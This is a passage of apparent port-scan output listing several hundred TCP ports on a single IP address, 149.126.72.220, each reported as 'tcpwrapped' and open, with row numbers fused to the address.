7614149.126.72.220 5271 tcp tcpwrapped open
7615149.126.72.220 5272 tcp tcpwrapped open
7616149.126.72.220 5273 tcp tcpwrapped open
7617149.126.72.220 5274 tcp tcpwrapped open
7618149.126.72.220 5275 tcp tcpwrapped open
7619149.126.72.220 5276 tcp tcpwrapped open
7620149.126.72.220 5277 tcp tcpwrapped open
7621149.126.72.220 5278 tcp tcpwrapped open
7622149.126.72.220 5279 tcp tcpwrapped open
7623149.126.72.220 5280 tcp tcpwrapped open
7624149.126.72.220 5440 tcp tcpwrapped open
7625149.126.72.220 5443 tcp tcpwrapped open
7626149.126.72.220 5456 tcp tcpwrapped open
7627149.126.72.220 5494 tcp tcpwrapped open
7628149.126.72.220 5495 tcp tcpwrapped open
7629149.126.72.220 5500 tcp tcpwrapped open
7630149.126.72.220 5503 tcp tcpwrapped open
7631149.126.72.220 5552 tcp tcpwrapped open
7632149.126.72.220 5555 tcp tcpwrapped open
7633149.126.72.220 5556 tcp tcpwrapped open
7634149.126.72.220 5557 tcp tcpwrapped open
7635149.126.72.220 5567 tcp tcpwrapped open
7636149.126.72.220 5568 tcp tcpwrapped open
7637149.126.72.220 5569 tcp tcpwrapped open
7638149.126.72.220 5590 tcp tcpwrapped open
7639149.126.72.220 5591 tcp tcpwrapped open
7640149.126.72.220 5592 tcp tcpwrapped open
7641149.126.72.220 5593 tcp tcpwrapped open
7642149.126.72.220 5594 tcp tcpwrapped open
7643149.126.72.220 5595 tcp tcpwrapped open
7644149.126.72.220 5596 tcp tcpwrapped open
7645149.126.72.220 5597 tcp tcpwrapped open
7646149.126.72.220 5598 tcp tcpwrapped open
7647149.126.72.220 5599 tcp tcpwrapped open
7648149.126.72.220 5600 tcp tcpwrapped open
7649149.126.72.220 5601 tcp tcpwrapped open
7650149.126.72.220 5602 tcp tcpwrapped open
7651149.126.72.220 5603 tcp tcpwrapped open
7652149.126.72.220 5604 tcp tcpwrapped open
7653149.126.72.220 5605 tcp tcpwrapped open
7654149.126.72.220 5606 tcp tcpwrapped open
7655149.126.72.220 5607 tcp tcpwrapped open
7656149.126.72.220 5608 tcp tcpwrapped open
7657149.126.72.220 5609 tcp tcpwrapped open
7658149.126.72.220 5613 tcp tcpwrapped open
7659149.126.72.220 5614 tcp tcpwrapped open
7660149.126.72.220 5620 tcp tcpwrapped open
7661149.126.72.220 5630 tcp tcpwrapped open
7662149.126.72.220 5640 tcp tcpwrapped open
7663149.126.72.220 5650 tcp tcpwrapped open
7664149.126.72.220 5660 tcp tcpwrapped open
7665149.126.72.220 5671 tcp tcpwrapped open
7666149.126.72.220 5672 tcp tcpwrapped open
7667149.126.72.220 5673 tcp tcpwrapped open
7668149.126.72.220 5680 tcp tcpwrapped open
7669149.126.72.220 5696 tcp tcpwrapped open
7670149.126.72.220 5698 tcp tcpwrapped open
7671149.126.72.220 5701 tcp tcpwrapped open
7672149.126.72.220 5721 tcp tcpwrapped open
7673149.126.72.220 5900 tcp tcpwrapped open
7674149.126.72.220 5901 tcp tcpwrapped open
7675149.126.72.220 5902 tcp tcpwrapped open
7676149.126.72.220 5903 tcp tcpwrapped open
7677149.126.72.220 5904 tcp tcpwrapped open
7678149.126.72.220 5905 tcp tcpwrapped open
7679149.126.72.220 5906 tcp tcpwrapped open
7680149.126.72.220 5907 tcp tcpwrapped open
7681149.126.72.220 5908 tcp tcpwrapped open
7682149.126.72.220 5909 tcp tcpwrapped open
7683149.126.72.220 5910 tcp tcpwrapped open
7684149.126.72.220 5911 tcp tcpwrapped open
7685149.126.72.220 5912 tcp tcpwrapped open
7686149.126.72.220 5913 tcp tcpwrapped open
7687149.126.72.220 5914 tcp tcpwrapped open
7688149.126.72.220 5915 tcp tcpwrapped open
7689149.126.72.220 5916 tcp tcpwrapped open
7690149.126.72.220 5917 tcp tcpwrapped open
7691149.126.72.220 5918 tcp tcpwrapped open
7692149.126.72.220 5919 tcp tcpwrapped open
7693149.126.72.220 5920 tcp tcpwrapped open
7694149.126.72.220 5984 tcp tcpwrapped open
7695149.126.72.220 5985 tcp tcpwrapped open
7696149.126.72.220 5986 tcp tcpwrapped open
7697149.126.72.220 5987 tcp tcpwrapped open
7698149.126.72.220 5988 tcp tcpwrapped open
7699149.126.72.220 5989 tcp tcpwrapped open
7700149.126.72.220 5990 tcp tcpwrapped open
7701149.126.72.220 5991 tcp tcpwrapped open
7702149.126.72.220 5992 tcp tcpwrapped open
7703149.126.72.220 5993 tcp tcpwrapped open
7704149.126.72.220 5994 tcp tcpwrapped open
7705149.126.72.220 5995 tcp tcpwrapped open
7706149.126.72.220 5996 tcp tcpwrapped open
7707149.126.72.220 5997 tcp tcpwrapped open
7708149.126.72.220 5998 tcp tcpwrapped open
7709149.126.72.220 5999 tcp tcpwrapped open
7710149.126.72.220 6000 tcp tcpwrapped open
7711149.126.72.220 6001 tcp tcpwrapped open
7712149.126.72.220 6002 tcp tcpwrapped open
7713149.126.72.220 6003 tcp tcpwrapped open
7714149.126.72.220 6004 tcp tcpwrapped open
7715149.126.72.220 6005 tcp tcpwrapped open
7716149.126.72.220 6006 tcp tcpwrapped open
7717149.126.72.220 6007 tcp tcpwrapped open
7718149.126.72.220 6008 tcp tcpwrapped open
7719149.126.72.220 6009 tcp tcpwrapped open
7720149.126.72.220 6010 tcp tcpwrapped open
7721149.126.72.220 6011 tcp tcpwrapped open
7722149.126.72.220 6021 tcp tcpwrapped open
7723149.126.72.220 6060 tcp tcpwrapped open
7724149.126.72.220 6061 tcp tcpwrapped open
7725149.126.72.220 6081 tcp tcpwrapped open
7726149.126.72.220 6100 tcp tcpwrapped open
7727149.126.72.220 6102 tcp tcpwrapped open
7728149.126.72.220 6134 tcp tcpwrapped open
7729149.126.72.220 6161 tcp tcpwrapped open
7730149.126.72.220 6331 tcp tcpwrapped open
7731149.126.72.220 6348 tcp tcpwrapped open
7732149.126.72.220 6379 tcp tcpwrapped open
7733149.126.72.220 6380 tcp tcpwrapped open
7734149.126.72.220 6433 tcp tcpwrapped open
7735149.126.72.220 6440 tcp tcpwrapped open
7736149.126.72.220 6443 tcp tcpwrapped open
7737149.126.72.220 6488 tcp tcpwrapped open
7738149.126.72.220 6500 tcp tcpwrapped open
7739149.126.72.220 6505 tcp tcpwrapped open
7740149.126.72.220 6510 tcp tcpwrapped open
7741149.126.72.220 6511 tcp tcpwrapped open
7742149.126.72.220 6512 tcp tcpwrapped open
7743149.126.72.220 6514 tcp tcpwrapped open
7744149.126.72.220 6543 tcp tcpwrapped open
7745149.126.72.220 6544 tcp tcpwrapped open
7746149.126.72.220 6560 tcp tcpwrapped open
7747149.126.72.220 6561 tcp tcpwrapped open
7748149.126.72.220 6565 tcp tcpwrapped open
7749149.126.72.220 6580 tcp tcpwrapped open
7750149.126.72.220 6581 tcp tcpwrapped open
7751149.126.72.220 6590 tcp tcpwrapped open
7752149.126.72.220 6601 tcp tcpwrapped open
7753149.126.72.220 6603 tcp tcpwrapped open
7754149.126.72.220 6605 tcp tcpwrapped open
7755149.126.72.220 6661 tcp tcpwrapped open
7756149.126.72.220 6662 tcp tcpwrapped open
7757149.126.72.220 6666 tcp tcpwrapped open
7758149.126.72.220 6686 tcp tcpwrapped open
7759149.126.72.220 6688 tcp tcpwrapped open
7760149.126.72.220 6700 tcp tcpwrapped open
7761149.126.72.220 6755 tcp tcpwrapped open
7762149.126.72.220 6775 tcp tcpwrapped open
7763149.126.72.220 6779 tcp tcpwrapped open
7764149.126.72.220 6789 tcp tcpwrapped open
7765149.126.72.220 6799 tcp tcpwrapped open
7766149.126.72.220 7000 tcp tcpwrapped open
7767149.126.72.220 7001 tcp tcpwrapped open
7768149.126.72.220 7002 tcp tcpwrapped open
7769149.126.72.220 7003 tcp tcpwrapped open
7770149.126.72.220 7004 tcp tcpwrapped open
7771149.126.72.220 7005 tcp tcpwrapped open
7772149.126.72.220 7007 tcp tcpwrapped open
7773149.126.72.220 7010 tcp tcpwrapped open
7774149.126.72.220 7011 tcp tcpwrapped open
7775149.126.72.220 7021 tcp tcpwrapped open
7776149.126.72.220 7070 tcp tcpwrapped open
7777149.126.72.220 7071 tcp tcpwrapped open
7778149.126.72.220 7079 tcp tcpwrapped open
7779149.126.72.220 7080 tcp tcpwrapped open
7780149.126.72.220 7081 tcp tcpwrapped open
7781149.126.72.220 7082 tcp tcpwrapped open
7782149.126.72.220 7083 tcp tcpwrapped open
7783149.126.72.220 7084 tcp tcpwrapped open
7784149.126.72.220 7085 tcp tcpwrapped open
7785149.126.72.220 7086 tcp tcpwrapped open
7786149.126.72.220 7087 tcp tcpwrapped open
7787149.126.72.220 7088 tcp tcpwrapped open
7788149.126.72.220 7090 tcp tcpwrapped open
7789149.126.72.220 7171 tcp tcpwrapped open
7790149.126.72.220 7172 tcp tcpwrapped open
7791149.126.72.220 7272 tcp tcpwrapped open
7792149.126.72.220 7348 tcp tcpwrapped open
7793149.126.72.220 7403 tcp tcpwrapped open
7794149.126.72.220 7433 tcp tcpwrapped open
7795149.126.72.220 7441 tcp tcpwrapped open
7796149.126.72.220 7443 tcp tcpwrapped open
7797149.126.72.220 7444 tcp tcpwrapped open
7798149.126.72.220 7445 tcp tcpwrapped open
7799149.126.72.220 7473 tcp tcpwrapped open
7800149.126.72.220 7500 tcp tcpwrapped open
7801149.126.72.220 7537 tcp tcpwrapped open
7802149.126.72.220 7687 tcp tcpwrapped open
7803149.126.72.220 7700 tcp tcpwrapped open
7804149.126.72.220 7771 tcp tcpwrapped open
7805149.126.72.220 7773 tcp tcpwrapped open
7806149.126.72.220 7774 tcp tcpwrapped open
7807149.126.72.220 7775 tcp tcpwrapped open
7808149.126.72.220 7776 tcp tcpwrapped open
7809149.126.72.220 7777 tcp tcpwrapped open
7810149.126.72.220 7778 tcp tcpwrapped open
7811149.126.72.220 7779 tcp tcpwrapped open
7812149.126.72.220 7788 tcp tcpwrapped open
7813149.126.72.220 7799 tcp tcpwrapped open
7814149.126.72.220 7998 tcp tcpwrapped open
7815149.126.72.220 7999 tcp tcpwrapped open
7816149.126.72.220 8000 tcp tcpwrapped open
7817149.126.72.220 8001 tcp tcpwrapped open
7818149.126.72.220 8002 tcp tcpwrapped open
7819149.126.72.220 8003 tcp tcpwrapped open
7820149.126.72.220 8004 tcp tcpwrapped open
7821149.126.72.220 8005 tcp tcpwrapped open
7822149.126.72.220 8006 tcp tcpwrapped open
7823149.126.72.220 8007 tcp tcpwrapped open
7824149.126.72.220 8008 tcp tcpwrapped open
7825149.126.72.220 8009 tcp tcpwrapped open
7826149.126.72.220 8010 tcp tcpwrapped open
7827149.126.72.220 8011 tcp tcpwrapped open
7828149.126.72.220 8012 tcp tcpwrapped open
7829149.126.72.220 8013 tcp tcpwrapped open
7830149.126.72.220 8014 tcp tcpwrapped open
7831149.126.72.220 8015 tcp tcpwrapped open
7832149.126.72.220 8016 tcp tcpwrapped open
7833149.126.72.220 8017 tcp tcpwrapped open
7834149.126.72.220 8018 tcp tcpwrapped open
7835149.126.72.220 8019 tcp tcpwrapped open
7836149.126.72.220 8020 tcp tcpwrapped open
7837149.126.72.220 8021 tcp tcpwrapped open
7838149.126.72.220 8022 tcp tcpwrapped open
7839149.126.72.220 8023 tcp tcpwrapped open
7840149.126.72.220 8024 tcp tcpwrapped open
7841149.126.72.220 8025 tcp tcpwrapped open
7842149.126.72.220 8026 tcp tcpwrapped open
7843149.126.72.220 8027 tcp tcpwrapped open
7844149.126.72.220 8028 tcp tcpwrapped open
7845149.126.72.220 8029 tcp tcpwrapped open
7846149.126.72.220 8030 tcp tcpwrapped open
7847149.126.72.220 8031 tcp tcpwrapped open
7848149.126.72.220 8032 tcp tcpwrapped open
7849149.126.72.220 8033 tcp tcpwrapped open
7850149.126.72.220 8034 tcp tcpwrapped open
7851149.126.72.220 8035 tcp tcpwrapped open
7852149.126.72.220 8036 tcp tcpwrapped open
7853149.126.72.220 8037 tcp tcpwrapped open
7854149.126.72.220 8038 tcp tcpwrapped open
7855149.126.72.220 8039 tcp tcpwrapped open
7856149.126.72.220 8040 tcp tcpwrapped open
7857149.126.72.220 8041 tcp tcpwrapped open
7858149.126.72.220 8042 tcp tcpwrapped open
7859149.126.72.220 8043 tcp tcpwrapped open
7860149.126.72.220 8044 tcp tcpwrapped open
7861149.126.72.220 8045 tcp tcpwrapped open
7862149.126.72.220 8046 tcp tcpwrapped open
7863149.126.72.220 8047 tcp tcpwrapped open
7864149.126.72.220 8048 tcp tcpwrapped open
7865149.126.72.220 8049 tcp tcpwrapped open
7866149.126.72.220 8050 tcp tcpwrapped open
7867149.126.72.220 8051 tcp tcpwrapped open
7868149.126.72.220 8052 tcp tcpwrapped open
7869149.126.72.220 8053 tcp tcpwrapped open
7870149.126.72.220 8054 tcp tcpwrapped open
7871149.126.72.220 8055 tcp tcpwrapped open
7872149.126.72.220 8056 tcp tcpwrapped open
7873149.126.72.220 8057 tcp tcpwrapped open
7874149.126.72.220 8058 tcp tcpwrapped open
7875149.126.72.220 8060 tcp tcpwrapped open
7876149.126.72.220 8064 tcp tcpwrapped open
7877149.126.72.220 8065 tcp tcpwrapped open
7878149.126.72.220 8069 tcp tcpwrapped open
7879149.126.72.220 8070 tcp tcpwrapped open
7880149.126.72.220 8071 tcp tcpwrapped open
7881149.126.72.220 8072 tcp tcpwrapped open
7882149.126.72.220 8074 tcp tcpwrapped open
7883149.126.72.220 8079 tcp tcpwrapped open
7884149.126.72.220 8080 tcp tcpwrapped open
7885149.126.72.220 8081 tcp tcpwrapped open
7886149.126.72.220 8082 tcp tcpwrapped open
7887149.126.72.220 8083 tcp tcpwrapped open
7888149.126.72.220 8084 tcp tcpwrapped open
7889149.126.72.220 8085 tcp tcpwrapped open
7890149.126.72.220 8086 tcp tcpwrapped open
7891149.126.72.220 8087 tcp tcpwrapped open
7892149.126.72.220 8088 tcp tcpwrapped open
7893149.126.72.220 8089 tcp tcpwrapped open
7894149.126.72.220 8090 tcp tcpwrapped open
7895149.126.72.220 8091 tcp tcpwrapped open
7896149.126.72.220 8092 tcp tcpwrapped open
7897149.126.72.220 8093 tcp tcpwrapped open
7898149.126.72.220 8094 tcp tcpwrapped open
7899149.126.72.220 8095 tcp tcpwrapped open
7900149.126.72.220 8096 tcp tcpwrapped open
7901149.126.72.220 8097 tcp tcpwrapped open
7902149.126.72.220 8098 tcp tcpwrapped open
7903149.126.72.220 8099 tcp tcpwrapped open
7904149.126.72.220 8100 tcp tcpwrapped open
7905149.126.72.220 8101 tcp tcpwrapped open
7906149.126.72.220 8102 tcp tcpwrapped open
7907149.126.72.220 8103 tcp tcpwrapped open
7908149.126.72.220 8104 tcp tcpwrapped open
7909149.126.72.220 8105 tcp tcpwrapped open
7910149.126.72.220 8106 tcp tcpwrapped open
7911149.126.72.220 8107 tcp tcpwrapped open
7912149.126.72.220 8108 tcp tcpwrapped open
7913149.126.72.220 8109 tcp tcpwrapped open
7914149.126.72.220 8110 tcp tcpwrapped open
7915149.126.72.220 8113 tcp tcpwrapped open
7916149.126.72.220 8114 tcp tcpwrapped open
7917149.126.72.220 8115 tcp tcpwrapped open
7918149.126.72.220 8118 tcp tcpwrapped open
7919149.126.72.220 8119 tcp tcpwrapped open
7920149.126.72.220 8120 tcp tcpwrapped open
7921149.126.72.220 8121 tcp tcpwrapped open
7922149.126.72.220 8123 tcp tcpwrapped open
7923149.126.72.220 8125 tcp tcpwrapped open
7924149.126.72.220 8126 tcp tcpwrapped open
7925149.126.72.220 8128 tcp tcpwrapped open
7926149.126.72.220 8129 tcp tcpwrapped open
7927149.126.72.220 8130 tcp tcpwrapped open
7928149.126.72.220 8131 tcp tcpwrapped open
7929149.126.72.220 8132 tcp tcpwrapped open
7930149.126.72.220 8133 tcp tcpwrapped open
7931149.126.72.220 8136 tcp tcpwrapped open
7932149.126.72.220 8140 tcp tcpwrapped open
7933149.126.72.220 8142 tcp tcpwrapped open
7934149.126.72.220 8143 tcp tcpwrapped open
7935149.126.72.220 8144 tcp tcpwrapped open
7936149.126.72.220 8147 tcp tcpwrapped open
7937149.126.72.220 8148 tcp tcpwrapped open
7938149.126.72.220 8149 tcp tcpwrapped open
7939149.126.72.220 8150 tcp tcpwrapped open
7940149.126.72.220 8154 tcp tcpwrapped open
7941149.126.72.220 8156 tcp tcpwrapped open
7942149.126.72.220 8157 tcp tcpwrapped open
7943149.126.72.220 8158 tcp tcpwrapped open
7944149.126.72.220 8160 tcp tcpwrapped open
7945149.126.72.220 8161 tcp tcpwrapped open
7946149.126.72.220 8162 tcp tcpwrapped open
7947149.126.72.220 8163 tcp tcpwrapped open
7948149.126.72.220 8164 tcp tcpwrapped open
7949149.126.72.220 8165 tcp tcpwrapped open
7950149.126.72.220 8166 tcp tcpwrapped open
7951149.126.72.220 8167 tcp tcpwrapped open
7952149.126.72.220 8168 tcp tcpwrapped open
7953149.126.72.220 8169 tcp tcpwrapped open
7954149.126.72.220 8170 tcp tcpwrapped open
7955149.126.72.220 8171 tcp tcpwrapped open
7956149.126.72.220 8172 tcp tcpwrapped open
7957149.126.72.220 8173 tcp tcpwrapped open
7958149.126.72.220 8175 tcp tcpwrapped open
7959149.126.72.220 8176 tcp tcpwrapped open
7960149.126.72.220 8178 tcp tcpwrapped open
7961149.126.72.220 8179 tcp tcpwrapped open
7962149.126.72.220 8180 tcp tcpwrapped open
7963149.126.72.220 8181 tcp tcpwrapped open
7964149.126.72.220 8182 tcp tcpwrapped open
7965149.126.72.220 8183 tcp tcpwrapped open
7966149.126.72.220 8184 tcp tcpwrapped open
7967149.126.72.220 8185 tcp tcpwrapped open
7968149.126.72.220 8186 tcp tcpwrapped open
7969149.126.72.220 8187 tcp tcpwrapped open
7970149.126.72.220 8188 tcp tcpwrapped open
7971149.126.72.220 8189 tcp tcpwrapped open
7972149.126.72.220 8190 tcp tcpwrapped open
7973149.126.72.220 8191 tcp tcpwrapped open
7974149.126.72.220 8192 tcp tcpwrapped open
7975149.126.72.220 8193 tcp tcpwrapped open
7976149.126.72.220 8194 tcp tcpwrapped open
7977149.126.72.220 8195 tcp tcpwrapped open
7978149.126.72.220 8198 tcp tcpwrapped open
7979149.126.72.220 8199 tcp tcpwrapped open
7980149.126.72.220 8200 tcp tcpwrapped open
7981149.126.72.220 8203 tcp tcpwrapped open
7982149.126.72.220 8222 tcp tcpwrapped open
7983149.126.72.220 8230 tcp tcpwrapped open
7984149.126.72.220 8236 tcp tcpwrapped open
7985149.126.72.220 8237 tcp tcpwrapped open
7986149.126.72.220 8238 tcp tcpwrapped open
7987149.126.72.220 8239 tcp tcpwrapped open
7988149.126.72.220 8241 tcp tcpwrapped open
7989149.126.72.220 8243 tcp tcpwrapped open
7990149.126.72.220 8248 tcp tcpwrapped open
7991149.126.72.220 8249 tcp tcpwrapped open
7992149.126.72.220 8250 tcp tcpwrapped open
7993149.126.72.220 8251 tcp tcpwrapped open
7994149.126.72.220 8252 tcp tcpwrapped open
7995149.126.72.220 8280 tcp tcpwrapped open
7996149.126.72.220 8282 tcp tcpwrapped open
7997149.126.72.220 8333 tcp tcpwrapped open
7998149.126.72.220 8340 tcp tcpwrapped open
7999149.126.72.220 8343 tcp tcpwrapped open
8000149.126.72.220 8350 tcp tcpwrapped open
8001149.126.72.220 8381 tcp tcpwrapped open
8002149.126.72.220 8382 tcp tcpwrapped open
8003149.126.72.220 8383 tcp tcpwrapped open
8004149.126.72.220 8384 tcp tcpwrapped open
8005149.126.72.220 8385 tcp tcpwrapped open
8006149.126.72.220 8388 tcp tcpwrapped open
8007149.126.72.220 8393 tcp tcpwrapped open
8008149.126.72.220 8401 tcp tcpwrapped open
8009149.126.72.220 8402 tcp tcpwrapped open
8010149.126.72.220 8403 tcp tcpwrapped open
8011149.126.72.220 8404 tcp tcpwrapped open
8012149.126.72.220 8405 tcp tcpwrapped open
8013149.126.72.220 8406 tcp tcpwrapped open
8014149.126.72.220 8407 tcp tcpwrapped open
8015149.126.72.220 8408 tcp tcpwrapped open
8016149.126.72.220 8409 tcp tcpwrapped open
8017149.126.72.220 8410 tcp tcpwrapped open
8018149.126.72.220 8411 tcp tcpwrapped open
8019149.126.72.220 8412 tcp tcpwrapped open
8020149.126.72.220 8413 tcp tcpwrapped open
8021149.126.72.220 8414 tcp tcpwrapped open
8022149.126.72.220 8415 tcp tcpwrapped open
8023149.126.72.220 8416 tcp tcpwrapped open
8024149.126.72.220 8417 tcp tcpwrapped open
8025149.126.72.220 8418 tcp tcpwrapped open
8026149.126.72.220 8419 tcp tcpwrapped open
8027149.126.72.220 8420 tcp tcpwrapped open
8028149.126.72.220 8421 tcp tcpwrapped open
8029149.126.72.220 8422 tcp tcpwrapped open
8030149.126.72.220 8423 tcp tcpwrapped open
8031149.126.72.220 8424 tcp tcpwrapped open
8032149.126.72.220 8425 tcp tcpwrapped open
8033149.126.72.220 8426 tcp tcpwrapped open
8034149.126.72.220 8427 tcp tcpwrapped open
8035149.126.72.220 8428 tcp tcpwrapped open
8036149.126.72.220 8429 tcp tcpwrapped open
8037149.126.72.220 8430 tcp tcpwrapped open
8038149.126.72.220 8431 tcp tcpwrapped open
8039149.126.72.220 8432 tcp tcpwrapped open
8040149.126.72.220 8433 tcp tcpwrapped open
8041149.126.72.220 8435 tcp tcpwrapped open
8042149.126.72.220 8440 tcp tcpwrapped open
8043149.126.72.220 8441 tcp tcpwrapped open
8044149.126.72.220 8442 tcp tcpwrapped open
8045149.126.72.220 8443 tcp tcpwrapped open
8046149.126.72.220 8444 tcp tcpwrapped open
8047149.126.72.220 8445 tcp tcpwrapped open
8048149.126.72.220 8446 tcp tcpwrapped open
8049149.126.72.220 8447 tcp tcpwrapped open
8050149.126.72.220 8448 tcp tcpwrapped open
8051149.126.72.220 8449 tcp tcpwrapped open
8052149.126.72.220 8450 tcp tcpwrapped open
8053149.126.72.220 8451 tcp tcpwrapped open
8054149.126.72.220 8452 tcp tcpwrapped open
8055149.126.72.220 8453 tcp tcpwrapped open
8056149.126.72.220 8454 tcp tcpwrapped open
8057149.126.72.220 8455 tcp tcpwrapped open
8058149.126.72.220 8456 tcp tcpwrapped open
8059149.126.72.220 8457 tcp tcpwrapped open
8060149.126.72.220 8458 tcp tcpwrapped open
8061149.126.72.220 8459 tcp tcpwrapped open
8062149.126.72.220 8460 tcp tcpwrapped open
8063149.126.72.220 8461 tcp tcpwrapped open
8064149.126.72.220 8462 tcp tcpwrapped open
8065149.126.72.220 8463 tcp tcpwrapped open
8066149.126.72.220 8464 tcp tcpwrapped open
8067149.126.72.220 8465 tcp tcpwrapped open
8068149.126.72.220 8466 tcp tcpwrapped open
8069149.126.72.220 8467 tcp tcpwrapped open
8070149.126.72.220 8470 tcp tcpwrapped open
8071149.126.72.220 8472 tcp tcpwrapped open
8072149.126.72.220 8473 tcp tcpwrapped open
8073149.126.72.220 8475 tcp tcpwrapped open
8074149.126.72.220 8480 tcp tcpwrapped open
8075149.126.72.220 8481 tcp tcpwrapped open
8076149.126.72.220 8482 tcp tcpwrapped open
8077149.126.72.220 8484 tcp tcpwrapped open
8078149.126.72.220 8485 tcp tcpwrapped open
8079149.126.72.220 8488 tcp tcpwrapped open
8080149.126.72.220 8493 tcp tcpwrapped open
8081149.126.72.220 8494 tcp tcpwrapped open
8082149.126.72.220 8500 tcp tcpwrapped open
8083149.126.72.220 8502 tcp tcpwrapped open
8084149.126.72.220 8503 tcp tcpwrapped open
8085149.126.72.220 8504 tcp tcpwrapped open
8086149.126.72.220 8505 tcp tcpwrapped open
8087149.126.72.220 8506 tcp tcpwrapped open
8088149.126.72.220 8510 tcp tcpwrapped open
8089149.126.72.220 8513 tcp tcpwrapped open
8090149.126.72.220 8514 tcp tcpwrapped open
8091149.126.72.220 8515 tcp tcpwrapped open
8092149.126.72.220 8519 tcp tcpwrapped open
8093149.126.72.220 8520 tcp tcpwrapped open
8094149.126.72.220 8521 tcp tcpwrapped open
8095149.126.72.220 8523 tcp tcpwrapped open
8096149.126.72.220 8524 tcp tcpwrapped open
8097149.126.72.220 8525 tcp tcpwrapped open
8098149.126.72.220 8526 tcp tcpwrapped open
8099149.126.72.220 8528 tcp tcpwrapped open
8100149.126.72.220 8529 tcp tcpwrapped open
8101149.126.72.220 8530 tcp tcpwrapped open
8102149.126.72.220 8531 tcp tcpwrapped open
8103149.126.72.220 8532 tcp tcpwrapped open
8104149.126.72.220 8533 tcp tcpwrapped open
8105149.126.72.220 8536 tcp tcpwrapped open
8106149.126.72.220 8540 tcp tcpwrapped open
8107149.126.72.220 8543 tcp tcpwrapped open
8108149.126.72.220 8544 tcp tcpwrapped open
8109149.126.72.220 8548 tcp tcpwrapped open
8110149.126.72.220 8549 tcp tcpwrapped open
8111149.126.72.220 8550 tcp tcpwrapped open
8112149.126.72.220 8551 tcp tcpwrapped open
8113149.126.72.220 8553 tcp tcpwrapped open
8114149.126.72.220 8556 tcp tcpwrapped open
8115149.126.72.220 8557 tcp tcpwrapped open
8116149.126.72.220 8558 tcp tcpwrapped open
8117149.126.72.220 8560 tcp tcpwrapped open
8118149.126.72.220 8561 tcp tcpwrapped open
8119149.126.72.220 8562 tcp tcpwrapped open
8120149.126.72.220 8563 tcp tcpwrapped open
8121149.126.72.220 8564 tcp tcpwrapped open
8122149.126.72.220 8565 tcp tcpwrapped open
8123149.126.72.220 8566 tcp tcpwrapped open
8124149.126.72.220 8567 tcp tcpwrapped open
8125149.126.72.220 8568 tcp tcpwrapped open
8126149.126.72.220 8569 tcp tcpwrapped open
8127149.126.72.220 8570 tcp tcpwrapped open
8128149.126.72.220 8571 tcp tcpwrapped open
8129149.126.72.220 8573 tcp tcpwrapped open
8130149.126.72.220 8574 tcp tcpwrapped open
8131149.126.72.220 8575 tcp tcpwrapped open
8132149.126.72.220 8576 tcp tcpwrapped open
8133149.126.72.220 8577 tcp tcpwrapped open
8134149.126.72.220 8578 tcp tcpwrapped open
8135149.126.72.220 8579 tcp tcpwrapped open
8136149.126.72.220 8580 tcp tcpwrapped open
8137149.126.72.220 8581 tcp tcpwrapped open
8138149.126.72.220 8582 tcp tcpwrapped open
8139149.126.72.220 8583 tcp tcpwrapped open
8140149.126.72.220 8585 tcp tcpwrapped open
8141149.126.72.220 8586 tcp tcpwrapped open
8142149.126.72.220 8588 tcp tcpwrapped open
8143149.126.72.220 8589 tcp tcpwrapped open
8144149.126.72.220 8590 tcp tcpwrapped open
8145149.126.72.220 8591 tcp tcpwrapped open
8146149.126.72.220 8592 tcp tcpwrapped open
8147149.126.72.220 8593 tcp tcpwrapped open
8148149.126.72.220 8594 tcp tcpwrapped open
8149149.126.72.220 8595 tcp tcpwrapped open
8150149.126.72.220 8596 tcp tcpwrapped open
8151149.126.72.220 8597 tcp tcpwrapped open
8152149.126.72.220 8598 tcp tcpwrapped open
8153149.126.72.220 8599 tcp tcpwrapped open
8154149.126.72.220 8600 tcp tcpwrapped open
8155149.126.72.220 8601 tcp tcpwrapped open
8156149.126.72.220 8605 tcp tcpwrapped open
8157149.126.72.220 8606 tcp tcpwrapped open
8158149.126.72.220 8630 tcp tcpwrapped open
8159149.126.72.220 8640 tcp tcpwrapped open
8160149.126.72.220 8641 tcp tcpwrapped open
8161149.126.72.220 8643 tcp tcpwrapped open
8162149.126.72.220 8663 tcp tcpwrapped open
8163149.126.72.220 8666 tcp tcpwrapped open
8164149.126.72.220 8686 tcp tcpwrapped open
8165149.126.72.220 8688 tcp tcpwrapped open
8166149.126.72.220 8700 tcp tcpwrapped open
8167149.126.72.220 8701 tcp tcpwrapped open
8168149.126.72.220 8702 tcp tcpwrapped open
8169149.126.72.220 8703 tcp tcpwrapped open
8170149.126.72.220 8704 tcp tcpwrapped open
8171149.126.72.220 8705 tcp tcpwrapped open
8172149.126.72.220 8706 tcp tcpwrapped open
8173149.126.72.220 8707 tcp tcpwrapped open
8174149.126.72.220 8708 tcp tcpwrapped open
8175149.126.72.220 8709 tcp tcpwrapped open
8176149.126.72.220 8723 tcp tcpwrapped open
8177149.126.72.220 8724 tcp tcpwrapped open
8178149.126.72.220 8731 tcp tcpwrapped open
8179149.126.72.220 8732 tcp tcpwrapped open
8180149.126.72.220 8764 tcp tcpwrapped open
8181149.126.72.220 8765 tcp tcpwrapped open
8182149.126.72.220 8766 tcp tcpwrapped open
8183149.126.72.220 8767 tcp tcpwrapped open
8184149.126.72.220 8771 tcp tcpwrapped open
8185149.126.72.220 8787 tcp tcpwrapped open
8186149.126.72.220 8788 tcp tcpwrapped open
8187149.126.72.220 8789 tcp tcpwrapped open
8188149.126.72.220 8790 tcp tcpwrapped open
8189149.126.72.220 8791 tcp tcpwrapped open
8190149.126.72.220 8800 tcp tcpwrapped open
8191149.126.72.220 8801 tcp tcpwrapped open
8192149.126.72.220 8802 tcp tcpwrapped open
8193149.126.72.220 8803 tcp tcpwrapped open
8194149.126.72.220 8804 tcp tcpwrapped open
8195149.126.72.220 8805 tcp tcpwrapped open
8196149.126.72.220 8806 tcp tcpwrapped open
8197149.126.72.220 8807 tcp tcpwrapped open
8198149.126.72.220 8808 tcp tcpwrapped open
8199149.126.72.220 8809 tcp tcpwrapped open
8200149.126.72.220 8810 tcp tcpwrapped open
8201149.126.72.220 8811 tcp tcpwrapped open
8202149.126.72.220 8812 tcp tcpwrapped open
8203149.126.72.220 8813 tcp tcpwrapped open
8204149.126.72.220 8814 tcp tcpwrapped open
8205149.126.72.220 8815 tcp tcpwrapped open
8206149.126.72.220 8816 tcp tcpwrapped open
8207149.126.72.220 8817 tcp tcpwrapped open
8208149.126.72.220 8818 tcp tcpwrapped open
8209149.126.72.220 8819 tcp tcpwrapped open
8210149.126.72.220 8820 tcp tcpwrapped open
8211149.126.72.220 8821 tcp tcpwrapped open
8212149.126.72.220 8822 tcp tcpwrapped open
8213149.126.72.220 8823 tcp tcpwrapped open
